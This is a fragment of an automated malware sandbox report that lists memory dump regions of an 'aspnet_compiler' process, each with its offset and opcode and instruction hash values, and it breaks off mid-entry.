                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 42bad84aeea878d6c3958ffce80735be552f1f3f699e33055037484d18138a73
                                                      • Instruction ID: a9f68e2417738242ba34785bb1b9c76cd36a12d2928980c69184794236c11fe2
                                                      • Opcode Fuzzy Hash: 42bad84aeea878d6c3958ffce80735be552f1f3f699e33055037484d18138a73
                                                      • Instruction Fuzzy Hash: 21519CB190021ADFCB24DFA9C98499EBBB9FF88314B95455AE505B3301DB34AD11CFD0
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 70c7f97cf10db960cd38e7084ddabd06c6b65cc4f9a83f640463c1ccfbb4310f
                                                      • Instruction ID: d76caf7bf24d24e467622fe15bf91dccf6cc0eaa00bb25d1da544e806176d7ed
                                                      • Opcode Fuzzy Hash: 70c7f97cf10db960cd38e7084ddabd06c6b65cc4f9a83f640463c1ccfbb4310f
                                                      • Instruction Fuzzy Hash: 984137717403129BDB3EEF68D986FAA77B4EB94708F44006DFE069B246D7719804D7A0
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                      • Instruction ID: fc375f1d05ebdaa4cae4874aa8656483ee7eddeb173458f571fa92fca24d6368
                                                      • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                      • Instruction Fuzzy Hash: 0541E9716007169FDB6DDF78C980A6EB7A9FF90210B0946AEE96287340EB30ED14C790
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8e8b97293308fb3f90b97b2cab68ae4958d3154dc0a4023fe4a6d956da28939a
                                                      • Instruction ID: bf41cce94981cc8d921ac655018adba91b9194349f3ebcefa4d4032a01e743aa
                                                      • Opcode Fuzzy Hash: 8e8b97293308fb3f90b97b2cab68ae4958d3154dc0a4023fe4a6d956da28939a
                                                      • Instruction Fuzzy Hash: 5D41DD32A0121A9BDB15DF98C644AEEBBF4FF48700F18816AF915F7240D7B49C42CBA4
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ff59d1138320aadd76e236b3d06e23770e05082d03889921d88af86c885c3bc9
                                                      • Instruction ID: 115faa958165001c2ee7c675e40fa43f20015064d1bbc4d374a94ac933cf21ba
                                                      • Opcode Fuzzy Hash: ff59d1138320aadd76e236b3d06e23770e05082d03889921d88af86c885c3bc9
                                                      • Instruction Fuzzy Hash: 1541AF712047029FDB24DF28C984A6BB7F9FF88214F45486EE557CB215EB35E849CB90
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                      • Instruction ID: 9f998bd27bb9f99d702bae34b7a622dbe9801f3f4a37a0735d16271c84350220
                                                      • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                      • Instruction Fuzzy Hash: E3516C75A00625CFCB19CFA9C480AADF7B2FF88710F2481A9D929A7751D730EE45CB90
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c2e5c2f8704afd03d68a600eeae80c2a0b3b351ec483225dd78e65bcb521377b
                                                      • Instruction ID: befe837f54c8ee11db17d66950209993a8be16e54e1ad70e3fce978fdb18bdc5
                                                      • Opcode Fuzzy Hash: c2e5c2f8704afd03d68a600eeae80c2a0b3b351ec483225dd78e65bcb521377b
                                                      • Instruction Fuzzy Hash: 4851E6B0D00246DBEB299B68CD40BE8BBB5FF15314F5882EAE519972C2E73499C1CF40
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1504a9a5e4ccf0a54f1467bc3082cf54ae393c115c3baf4fd4deee86383fa869
                                                      • Instruction ID: 67e9a9ca4bde115c35f3b7304483f1ae316e076e22d1311c7afa8f01f2d7b072
                                                      • Opcode Fuzzy Hash: 1504a9a5e4ccf0a54f1467bc3082cf54ae393c115c3baf4fd4deee86383fa869
                                                      • Instruction Fuzzy Hash: A7418571A00268DBDB21DF68CA80BEE7BB8EF45750F0505A9E908AB242D774DE84CF51
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                      • Instruction ID: fcce3889ff3aa68e4da09e66478dda83c30348049da07c1e36a6847f33601e34
                                                      • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                      • Instruction Fuzzy Hash: 4B418575B00105ABDF19DF99CC98AAFBBBAEF88610F1440A9E915E7351DB70DD0187A0
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 86355254d38bc14d0b77a24923cf3113e661420b6900dd0dfd2b9303880ec3be
                                                      • Instruction ID: c456defe6b70f50b71a4ca9ea86ef69e7a370d4bcbf7eb9c62e783666a7a1a7c
                                                      • Opcode Fuzzy Hash: 86355254d38bc14d0b77a24923cf3113e661420b6900dd0dfd2b9303880ec3be
                                                      • Instruction Fuzzy Hash: 5841E2B06007819FE325CF68C680A63BBF9FF48314B148A6EE557C7A52E730E845CB90
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b45ae9783807f4d444f3c971b28b59a6706a0a5cb4ad3a5a3c267e07f62a3ee7
                                                      • Instruction ID: 3c14a9b021a4a1167acea97a770635a893df3e34d039e16f0b402888a331eec6
                                                      • Opcode Fuzzy Hash: b45ae9783807f4d444f3c971b28b59a6706a0a5cb4ad3a5a3c267e07f62a3ee7
                                                      • Instruction Fuzzy Hash: 76411132900604CFDF25EF68C5847ED7BB4FF08310F980599D412AB295DB75D900CBA0
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: aa496a1ea84045c237fb142b2e5e6aae721d47f3beb6e206e09a10b5c71701ca
                                                      • Instruction ID: 7366283f3f8e0ad7c4060531bfbcdefa76fef64f3c9a46a7a4ae679e3f225191
                                                      • Opcode Fuzzy Hash: aa496a1ea84045c237fb142b2e5e6aae721d47f3beb6e206e09a10b5c71701ca
                                                      • Instruction Fuzzy Hash: A1412671900242CFD724AF4CC9C1AEABBBDFF95704F69802ED5049B25AD77AD801CB90
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d9ca2ba8d8a7e35ef6dcc8faef49c3e65ccea0248acf912a071b034ca0bb7e6e
                                                      • Instruction ID: 607923711911ec82a996612ebbc05a0bfe93501ac5791db9631c9ad4732c841e
                                                      • Opcode Fuzzy Hash: d9ca2ba8d8a7e35ef6dcc8faef49c3e65ccea0248acf912a071b034ca0bb7e6e
                                                      • Instruction Fuzzy Hash: 0B416A315087069ED312DF69C940A6BFBE8EF88B54F44092EF984D7250E734DE058B93
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                      • Instruction Fuzzy Hash: 30212B36600652A6CF19EB958840ABABFB8EFA0750F40805EFAE587691E73CD950C760
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2bc87050c95744b88edbc769fba83095849cac1ead7bc44d8f59a09918452841
                                                      • Instruction ID: 3b4077d2ee7287a3f5ba2cc857a327bdba7264ed9f37acc0044bd54c2c5fcf41
                                                      • Opcode Fuzzy Hash: 2bc87050c95744b88edbc769fba83095849cac1ead7bc44d8f59a09918452841
                                                      • Instruction Fuzzy Hash: 4F31F431A0052D9BDB31DB28CD41FEEB7BDAB15740F4100A5E645A7291D771AE808FA0
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                      • Instruction ID: eea9a19d8f712d309b161befb859d74c12fffa8f28943e35125259a89a7862b4
                                                      • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                      • Instruction Fuzzy Hash: 86219131A00609EBCB15DF58C984A8EBBF9FF4C714F108469EE25DB241D674EE058F90
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 87b481c096ddb9ff77d08d86643afa317f3f2ed425512d1a179b69377ad95e88
                                                      • Instruction ID: bfcf6fdc9ee084641fb078a2897375a7586fff68d609257b97f8db181c558397
                                                      • Opcode Fuzzy Hash: 87b481c096ddb9ff77d08d86643afa317f3f2ed425512d1a179b69377ad95e88
                                                      • Instruction Fuzzy Hash: 9721E1326047059BCB22DF68CA84B6B77E8FF8C720F054529FD589B641C734ED018BA2
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                      • Instruction ID: 45b16e7e04d1b7ec7a044c88737f85c2065ee8fe493c587dc6f22c2d1466d7da
                                                      • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                      • Instruction Fuzzy Hash: B0319A31600604EFDB25CFA8C984F6AB7B9EF45354F1445A9E5128B281E734EE01CB50
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 379f639dc154693a1b798f603faecc35ac20a9b711c3a7fb9235555ffdeb6a8e
                                                      • Instruction ID: 21868b0697dfd429cdef92f19ce56d1183951a7ea888220f28a54608345262a3
                                                      • Opcode Fuzzy Hash: 379f639dc154693a1b798f603faecc35ac20a9b711c3a7fb9235555ffdeb6a8e
                                                      • Instruction Fuzzy Hash: EC317C75600215DFCB2ACF1DC8849AEB7F6EF84304B194599F809AB391E771EA45CB90
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 25b44963c1df974fc8ecdccfa5b23e53d2d57672604525af31c83013932845be
                                                      • Instruction ID: dea33e1943897f87e5e14c424749d3b4b49520fd3c001deda44696d8a55ed136
                                                      • Opcode Fuzzy Hash: 25b44963c1df974fc8ecdccfa5b23e53d2d57672604525af31c83013932845be
                                                      • Instruction Fuzzy Hash: 16218071A0012AEBCF25DF59C981ABEB7F4FF48740B5100A9F541A7240D738AD52CBA0
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 00276090c4f8b9158539659ce9ad16d30b4e901ef95b23b823050235768d1ed0
                                                      • Instruction ID: ac652f5a72d52b0ca964c3ad6583cbca0cfed64135593e75b66139f5b5d7902c
                                                      • Opcode Fuzzy Hash: 00276090c4f8b9158539659ce9ad16d30b4e901ef95b23b823050235768d1ed0
                                                      • Instruction Fuzzy Hash: 23219C71600645AFDB15EBADC940F6AB7A8FF88740F1440A9F904D7691D734ED50CBA8
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6e6d3b332a3784361eff845da7ff386f588516e4af42339ade4416b77b91cfca
                                                      • Instruction ID: 5125f775416d10f29f0e17d88463181fe8893efe9bba6efbb8428e4fda8e33ae
                                                      • Opcode Fuzzy Hash: 6e6d3b332a3784361eff845da7ff386f588516e4af42339ade4416b77b91cfca
                                                      • Instruction Fuzzy Hash: A621D0729047469BD715EF69C984BABBBECEFD5640F08449ABD80C7251D730C918C7A2
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f07b26f59506a87b9f538cc5705b0fbcf69ef76bda2f76f9f666c58161788b49
                                                      • Instruction ID: 232174eb6566855f3aa08429be70bce02c5495b2751ae0298ad590256faf618b
                                                      • Opcode Fuzzy Hash: f07b26f59506a87b9f538cc5705b0fbcf69ef76bda2f76f9f666c58161788b49
                                                      • Instruction Fuzzy Hash: 04212331606AC19BE727673C8D44B283B94EF41B70F6A03E5FA219B6E2DB68D801C210
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f62f7f315a99f451b4b2c7d90c394c27a1df9b4fb2c59c297b01889b685edc77
                                                      • Instruction ID: 4c806f36d79557eb808d9f3e375df4ebc25c9fa39327b1b50270b99e36d5f769
                                                      • Opcode Fuzzy Hash: f62f7f315a99f451b4b2c7d90c394c27a1df9b4fb2c59c297b01889b685edc77
                                                      • Instruction Fuzzy Hash: D221AC792006119FCB29DF29C901B56B7F5FF08B04F1884ADE509CB761E371E846CB94
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 82c3fa5457e53aceed00e2a9e9225a41c35d98dd41aa106a84412c98851e040f
                                                      • Instruction ID: dd6cd53201ac8f3d9b343b4ef0077d4542f28e15762552c9581e1d8c0f9deb36
                                                      • Opcode Fuzzy Hash: 82c3fa5457e53aceed00e2a9e9225a41c35d98dd41aa106a84412c98851e040f
                                                      • Instruction Fuzzy Hash: 3E113A72380A11BFDB26A5749C41F2B769DDBE4B60F1000A8B708EB190EF78DC0187D5
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 27db5008e3ef519573c657c2588332f2e8176896388431ba4640c61459d91fcf
                                                      • Instruction ID: 96af5e3d1af4b668081bf206a02379b199c6a6fd212ce8ff2548edfda2fa9b54
                                                      • Opcode Fuzzy Hash: 27db5008e3ef519573c657c2588332f2e8176896388431ba4640c61459d91fcf
                                                      • Instruction Fuzzy Hash: B921C6B1E00249ABDB24DFAED9819AEFBF8FF98710F10016EE505A7250D7709945CB54
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                      • Instruction ID: 81e39039b98199623e746b54212991d334971bfce6e568fcf45ed262a749dce3
                                                      • Opcode Fuzzy Hash: 5cbf44edbda76f4502fdddb46b30f07fa62677dc347fe83d1d029fa4afc5ea58
                                                      • Instruction Fuzzy Hash: 0B218E72A00209EFDF129F99CC40BAEBBB9EF48710F20845AF905A7251D734D950EB50
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                      • Instruction ID: e5a4c745ba1e1f696842ecce58c58220394e280672790d70ad3688f7fc7952f9
                                                      • Opcode Fuzzy Hash: bd8ac78140f895066083d1addf409b64165891323dc0076c6e3fdac533eabcce
                                                      • Instruction Fuzzy Hash: 1411E272600705AFD7269B58CE88F9ABBB8EB80754F110029F6008F180D6B1ED44CB60
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 091806fa2197089188d1258ae6114d078558a4e9cefba8b1551944636322aba6
                                                      • Instruction ID: 799bc36383aa4821989cb8e09adbdfd203112549baf5185e71f6797314a61dbf
                                                      • Opcode Fuzzy Hash: 091806fa2197089188d1258ae6114d078558a4e9cefba8b1551944636322aba6
                                                      • Instruction Fuzzy Hash: C61104317016919BDB12CF4DC5C0A9ABBEDAF4A755B1840BDEE088F206D6B6D942C790
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                      • Instruction ID: 640b6244a75b80d1da134ad345758b582ced7807ba0e1a2c98dbe5e5a41e8904
                                                      • Opcode Fuzzy Hash: 3b9caaf395a22a4929ed725bdef4f5484843110ef385696de3fd96b14fff4041
                                                      • Instruction Fuzzy Hash: 16218872600A41DFDB359F49C648A66FBF6EB94B50F14897DE94A9BA10C730EC01CB80
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e4c272f1176408a3d2c029c9f681917ac27beccbb995671cfe1a02f418e95f36
                                                      • Instruction ID: 78571980afb00c831b75ab50f616ca7930c717e3f7b0700b61456a61dce5c688
                                                      • Opcode Fuzzy Hash: e4c272f1176408a3d2c029c9f681917ac27beccbb995671cfe1a02f418e95f36
                                                      • Instruction Fuzzy Hash: 2D219D71A01246DFCB14CF9CC581AAEBBB9FB88718F24416DD105AB311CB75AD06CBD0
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fc6b4a451f2fb35769333cac8490a28dc0634ce16ce229248939ccd262a9b5e8
                                                      • Instruction ID: b76a03c1400c98271ec55ccf6a73fc16c76be5223dee0fe90c6808b55009f2b6
                                                      • Opcode Fuzzy Hash: fc6b4a451f2fb35769333cac8490a28dc0634ce16ce229248939ccd262a9b5e8
                                                      • Instruction Fuzzy Hash: C2218C71600A01EFD7218F69C881B66B7F8FF54650F44882DE5AEC7250DB70A840CBA0
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 56be0c2c7b2ceee0d1a74e844208fb758e40a6af5058fef832f7506d73fd0339
                                                      • Instruction ID: 4c73fa7f6f698c05a6fc1a5de67d174eac53da777c68877bcbefb868b1559f29
                                                      • Opcode Fuzzy Hash: 56be0c2c7b2ceee0d1a74e844208fb758e40a6af5058fef832f7506d73fd0339
                                                      • Instruction Fuzzy Hash: 3A1125732051109BCB19CB28CD80A7BB766EBD5370B69456DD923CB280EA308C02C690
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cc27b79de6a0c9bc46236119c79d860c1420d4db7cb60c53b0ed1f3bc357e777
                                                      • Instruction ID: 85a2d8456ff188910c6602cf94dc2e771cac1a2e5bdc153ca9af01b76bd7b8c0
                                                      • Opcode Fuzzy Hash: cc27b79de6a0c9bc46236119c79d860c1420d4db7cb60c53b0ed1f3bc357e777
                                                      • Instruction Fuzzy Hash: BA11E336640604FFD726DB5DCD40F9A77A8EF5AB50F018069F205DB251DBB0E901D7A0
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0b909ad910cfba8c2183bf9b298d93950570e81a1bbf56161e5d5c73d3c9d261
                                                      • Instruction ID: a4fb0bea7c8b70488150f8a55688505224cea3168d86e7541129d7bd7c0940e8
                                                      • Opcode Fuzzy Hash: 0b909ad910cfba8c2183bf9b298d93950570e81a1bbf56161e5d5c73d3c9d261
                                                      • Instruction Fuzzy Hash: E2119EB6A51205DFCB25CF59C584A5ABBF8AFA4750F09847ED909AB311FB34DD00CB90
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1889653911.0000000001A80000.00000040.00001000.00020000.00000000.sdmp, Offset: 01A80000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1a80000_aspnet_compiler.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                      • Instruction ID: ad6e2d6ef71e3c9e6013b6521538912f1a0a3a5d33611536127f60b91405f3b7
                                                      • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
